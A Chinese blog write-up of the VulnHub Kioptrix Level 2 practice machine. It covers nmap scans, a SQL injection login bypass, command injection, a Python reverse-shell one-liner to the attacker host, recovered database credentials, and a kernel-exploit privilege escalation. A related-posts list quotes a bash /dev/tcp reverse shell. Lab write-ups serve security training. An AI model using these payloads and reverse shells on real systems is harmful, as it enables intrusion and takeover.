vulnhub之Kioptrix Level 2

最新推荐文章于 2024-07-19 07:54:07 发布
最新推荐文章于 2024-07-19 07:54:07 发布
阅读量505 收藏 2
点赞数
文章标签: 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/li1136594919/article/details/131135094
版权

1、靶机导入

        靶机的默认网络方式为桥接,而且改为NAT模式后会自动更改,grud模式也进不去,来来回回折腾了两个小时,都还没搞定IP分配的问题,一度想要删掉靶机。后来想别人的writeup中说不定有root密码,就发现了这一个帖子:

修改靶机Kioptrix: Level 1 的网络模式 - Jason_huawen - 博客园 (cnblogs.com)

 非常感谢这位大佬的分享。

2、信息收集

2.1 开放端口扫描

tcp

└─$ cat tcp_open_port.nmap    
# Nmap 7.93 scan initiated Fri Jun  9 19:56:14 2023 as: nmap --min-rate 10000 -p- -oA tcp_open_port 192.168.62.177
Nmap scan report for 192.168.62.177
Host is up (0.0029s latency).
Not shown: 65528 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
111/tcp  open  rpcbind
443/tcp  open  https
601/tcp  open  syslog-conn
631/tcp  open  ipp
3306/tcp open  mysql
MAC Address: 00:0C:29:FD:C5:48 (VMware)

# Nmap done at Fri Jun  9 19:56:20 2023 -- 1 IP address (1 host up) scanned in 6.06 seconds
 

udp

# Nmap 7.93 scan initiated Fri Jun  9 19:56:20 2023 as: nmap -sU --min-rate 10000 -p- -oA udp_open_port 192.168.62.177
Warning: 192.168.62.177 giving up on port because retransmission cap hit (10).
Nmap scan report for 192.168.62.177
Host is up (0.015s latency).
Not shown: 65456 open|filtered udp ports (no-response), 78 closed udp ports (port-unreach)
PORT    STATE SERVICE
111/udp open  rpcbind
MAC Address: 00:0C:29:FD:C5:48 (VMware)

# Nmap done at Fri Jun  9 19:57:33 2023 -- 1 IP address (1 host up) scanned in 72.62 seconds

2.2 开放端口服务及其版本扫描

# Nmap 7.93 scan initiated Fri Jun  9 19:57:33 2023 as: nmap -sT -sV -O -sC -p22,80,111,443,601,631,3306, -oA open_port_service 192.168.62.177                                                                   
Nmap scan report for 192.168.62.177                                                                                                                                                                              
Host is up (0.00069s latency).                                                                                                                                                                                   
                                                                                                                                                                                                                 
PORT     STATE SERVICE  VERSION                                                                                                                                                                                  
22/tcp   open  ssh      OpenSSH 3.9p1 (protocol 1.99)                                                                                                                                                            
|_sshv1: Server supports SSHv1                                                                                                                                                                                   
| ssh-hostkey:                                                                                                                                                                                                   
|   1024 8f3e8b1e5863fecf27a318093b52cf72 (RSA1)                                                                                                                                                                 
|   1024 346b453dbacecab25355ef1e43703836 (DSA)                                                                                                                                                                  
|_  1024 684d8cbbb65abd7971b87147ea004261 (RSA)                                                                                                                                                                  
80/tcp   open  http     Apache httpd 2.0.52 ((CentOS))                                                                                                                                                           
|_http-server-header: Apache/2.0.52 (CentOS)                                                                                                                                                                     
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).                                                                                                                                              
111/tcp  open  rpcbind  2 (RPC #100000)                                                                                                                                                                          
| rpcinfo: 
|   program version    port/proto  service
|   100000  2            111/tcp   rpcbind
|   100000  2            111/udp   rpcbind
|   100024  1            601/tcp   status
|_  100024  1           1022/udp   status
443/tcp  open  ssl/http Apache httpd 2.0.52 ((CentOS))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|     SSL2_DES_64_CBC_WITH_MD5
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|     SSL2_RC2_128_CBC_WITH_MD5
|     SSL2_RC4_64_WITH_MD5
|_    SSL2_RC4_128_WITH_MD5

|_ssl-date: 2023-06-09T08:48:15+00:00; -3h09m37s from scanner time.
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2009-10-08T00:10:47
|_Not valid after:  2010-10-08T00:10:47
|_http-server-header: Apache/2.0.52 (CentOS)
601/tcp  open  status   1 (RPC #100024)
631/tcp  open  ipp      CUPS 1.1
|_http-title: 403 Forbidden
| http-methods: 
|_  Potentially risky methods: PUT
|_http-server-header: CUPS/1.1
3306/tcp open  mysql    MySQL (unauthorized)
MAC Address: 00:0C:29:FD:C5:48 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.30
Network Distance: 1 hop

Host script results:
|_clock-skew: -3h09m37s

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Jun  9 19:57:59 2023 -- 1 IP address (1 host up) scanned in 26.15 seconds
 

2.3 nmap漏洞脚本扫描

2.4  80端口目录爆破

        本来是要进行2.3和2.4的,但是我看到80端口开放,打开浏览器直接访问,然后看到登陆页面,进行sql万能注入语句 ' or 1=1,就进去了,然后看到经典的命令执行漏洞,直接getshell。做完这些漏洞脚本和目录爆破都还没结束,所以就不贴上来了。

3、getshell

  ①打开浏览器,输入靶机ip,发现是一个admin的登陆页面,使用sql万能注入语句' or 1=1-- + 直接登陆进去。

②然后就是经典的命令注入页面:

        使用127.0.0.1 && id 进行测试,回显发现确实是命令注入漏洞。

③使用python语句进行反弹shell

127.0.0.1 &&python -c 'import os,socket,sys,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.62.156",443));[os.dup2(s.fileno(),fd)for fd in (0,1,2)];pty.spawn("/bin/bash");'

        kali收到反弹shell 

4、提权

 4.1 最终提权

        uname -a查找内核版本,然后在kali searchsploit上发现POC 9545.c,上传到靶机编译执行,提权成功。

 4.2 提权过程思考

①有登陆页面且能登陆,也就意味着大概率有数据库,直接查找连接数据库的配置文件。

        发现index.php里有数据库的用户名和密码john/hiroshima

        登陆数据库进行查看,有mysql,test,webapp三个库。 

         查看webapp库里的表和数据,发现了两个用户凭据

         查看mysql的用户表,找到密码进行解密,发现和登入数据库的密码一样

②没其他有用信息了,退出数据库,查看/etc/passwd中可以登陆的用户,

         有root,mysql,john,harold.

③使用hydra对刚刚得到的hiroshima,5afac8d85f,66lajGGbla三个密码和四个用户进行撞库,失败了。

④考虑mysql的udf提权,但从收集的信息看不可能,也放弃了。

⑤看历史记录,定时任务,suid文件,sgid文件,apache可写文件,都没提权有用信息。

⑥最后才考虑内核提权。

 

 

 

Kioptrix Level 2 靶机wp
m0_52496313的博客
08-12 954
Kioptrix Level 2靶机wp
vulnhub靶场 Kioptrix-level-1
qq_69775412的博客
10-08 748
简介: vulnhub是一个提供靶场环境的平台。而Kioptrix-level-1就是一个对新手比较友好的靶场。初学渗透的同学可以做做试试看,项目地址如下。
Kioptrix Level 2
cxyzupup的博客
01-10 2274
Kioptrix Level 2 项目地址:https://www.vulnhub.com/entry/kioptrix-level-11-2,23/ 提示:靶机网络连接方式使用NAT模式。 文章目录Kioptrix Level 2一、信息收集:1.使用fping工具查找靶机IP:2.使用nmap对目标主机端口进行枚举:二、信息利用:1. 访问http和https服务查看源码并未发现有用信息,因此直接枚举web服务:2. nmap枚举到了该系统使用了mysql,因此可以使用sqlmap进行注入探测3. 使用
渗透测试靶机---Kioptrix Level 2
久恙502的博客
07-19 310
渗透测试,打靶经历记录,大佬多多指点,谢谢!!
vuInhub靶场实战系列--Kioptrix Level #2
weixin_45221204的博客
06-09 1001
Vulnhub是一个提供各种漏洞环境的靶场平台,大部分环境是做好的虚拟机镜像文件,镜像预先设计了多种漏洞。本文介绍Kioptrix Level #2靶机渗透测试,内容包括主机扫描(nmap\netdiscover)、端口扫描(nmap\masscan)、目录扫描(dirb\dirsearch)、netcat、反弹shell、脚本利用、linux内核提权等内容。p=49Checksum主机发现目录扫描端口扫描netcat监听反弹shelllinux内核提权。
Vulnhub靶机 Kioptrix: Level 2
菜浪马废的博客
04-08 335
靶机,扫端口 没有验证机制 看的我都想暴力破解了 万能密码试一下 可以绕过 admin‘ or ’1‘=’1 抓包,这个样子 命令执行 192.168.0.128;bash -i >& /dev/tcp/192.168.0.128/4444 0>&1& nmap -lnvp 4444 linux内核2.6.9 ...
Vulnhub靶机Kioptrix_Level1.2
qq_48904485的博客
03-14 606
运行环境:Virtualbox攻击机:kali(192.168.56.101)靶机Kioptrix_Level1.2(192.168.56.106)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/kioptrix-level-12-3,24/
Vulnhub靶机Kioptrix_Level1
qq_48904485的博客
03-12 1196
运行环境:Virtualbox攻击机:kali(192.168.56.101)靶机Kioptrix_Level1(192.168.56.105)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/kioptrix-level-1-1,22/
Vulnhub靶机Kioptrix_Level1.3
qq_48904485的博客
03-17 588
运行环境:Virtualbox攻击机:kali(192.168.56.101)靶机Kioptrix_Level1.3(192.168.56.109)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/kioptrix-level-13-4,25安装虚拟机:由于下载下来的压缩包内只有一个虚拟硬盘,需要打开一个虚拟机加入这块硬盘选择自定义安装操作系统选择linux,版本随便选一个,其他默认即可。
KIOPTRIX: LEVEL 1.1-VulnHub靶机学习第三篇
qq_27466929的博客
08-25 1007
VulnHub靶机学习第三篇:KIOPTRIX: LEVEL 1.1
Vulnhub靶机Kioptrix Level 2 writeup
xingjinhao123的博客
01-09 1273
Vulnhub靶机Kioptrix Level 2渗透
VulnHub——Kioptrix Level 2
江左盟的博客
04-21 1305
简介 信息收集 使用fping -agq 192.168.0.0/24探测局域网内其它主机,发现目标主机IP地址,如图: 然后使用nmap --min-rate 10000 -T5 -A -sC -p1-65535 192.168.0.129快速扫描目标主机开启的端口与服务,发现开启22,80,111,443,631,660和3306端口, 使用SearchSploit搜...
Vulnhub系列:Kioptrix Level 2
Fuzz
07-31 327
简介 Vulnhub简介 Vulnhub是一个提供各种漏洞环境的靶场平台。 个人学习目的:1,方便学习更多类型漏洞。2,为0SCP做打基础。 下载链接 运行环境 kali:192.168.44.128 Vulnhub靶机:192.168.44.133 相关知识点 0x00、信息收集 主机发现 :nmap -sP 192.168.44.0/24 端口扫描:nmap -sS -sV -T5 -p- 192.168.44.133 0x01、Web 发现 ...
Kioptrix Level 2入门级详细教程&小白也能看懂!
jockerboss的博客
02-27 1294
Kioptrix Level 2入门级教程&小白也能看懂!简单易懂
黑客零基础第三章-Web漏洞利用实战-命令注入Kioptrix Level 2
ShadowBlade
08-16 2636
第三节内容讲述了Web命令注入漏洞和原理,并在DVWA上体验了一把入侵。本节以实战的方式,结合vulnhub靶机Kioptrix Level 2让大家体会命令注入的真实入侵。这个靶机会涉及到一点SQL注入的知识,但易于理解。后续章节会给大家着重讲解SQL注入。 如果靶机部署有疑问,请留言! 1.信息收集 kali IP为192.168.17.4 发现靶机IP192.168.17.5 使用第二章nmap命令扫描靶机, nmap -p `nmap -p- --min-rate=10000 ..
Kioptrix: Level 2靶机实战 sql注入万能密码到后台 命令执行;getshell 内核漏洞9542 提权
YouthBelief的博客
11-24 1448
Kioptrix: Level 1靶机实战前言0x01 信息收集1.1 探测靶机ip1.2 nmap探测端口0x02 漏洞探测2.1 访问首页 80端口2.1.1远程系统管理员登录界面2.1.1.1 尝试万能密码2.1.1.2 sqlmap2.1.2 命令执行漏洞利用0x03提权3.1查看当前权限3.2内核漏洞提权3.2.1 查看操作系统版本和内核版本3.2.2 找版本漏洞3.2.3上传到靶机中3.2.4 编译运行0x04 总结 前言 Kioptrix: Level 2 (#1): 靶机地址 https:
Kioptrix Level2
底层社会中的弱智
04-16 955
目标IP:192.168.11.176 端口开放情况: 先从80端口入手 使用抓包--爆破 暂不使用 测试注入 目录扫描 使用post传值,我们抓包后放到sqlmap中测试 添加*号优先测试 sqlmap -r q.txt --level 5 --risk 3 逐步跑出用户名和密码 sqlmap -r q.txt --level 5 --risk 3 -...
VulnHub Kioptrix Level 4 通过sqlmap --os shell提权 的详细打靶过程及相应代码
最新发布
10-26
VulnHubKioptrix Level 4是一个常见的渗透测试平台,它模拟了一个Linux服务器环境,挑战玩家通过一系列的安全漏洞进行系统级别的权限提升。在这个级别中,其中一个目标是利用SQL注入漏洞并使用`sqlmap`工具获取...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值